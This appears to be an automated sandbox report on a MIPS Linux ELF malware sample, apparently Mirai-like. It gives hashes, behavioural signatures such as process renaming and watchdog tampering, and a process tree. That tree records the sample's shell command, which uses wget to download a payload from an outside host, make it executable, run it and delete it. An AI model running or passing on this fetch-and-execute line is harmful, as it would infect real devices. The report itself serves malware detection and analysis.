Analysis
-
max time kernel
117s -
max time network
119s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240226-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
02/04/2024, 01:26
Behavioral task
behavioral1
Sample
e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
Resource
debian9-mipsbe-20240226-en
General
-
Target
e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
-
Size
155KB
-
MD5
6153fdb5e5899070229f1c544ab3d291
-
SHA1
cc61abc7d93b729f284efd418dfc815deaef2ba9
-
SHA256
e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d
-
SHA512
cf66e060c87cf967af1f134a20668b3f9aabf2b27f3551c33c529e93e9815dfdbd86eef2435a5c6251a30daea1ecae45f19cd11616729b5880ec65e174971141
-
SSDEEP
3072:B7esBFP23rWfOB7ZOOyGgWKmrThPaLEne7rNb:1euCloGgrmrThPaLEne7rNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 696 e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 711 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:696 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:697
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:701
-
-
/bin/chmodchmod 777 .....3⤵PID:710
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:711
-
-
/bin/sh/bin/sh ./.....3⤵PID:711
-
-
/bin/rmrm -rf .....3⤵PID:715
-
-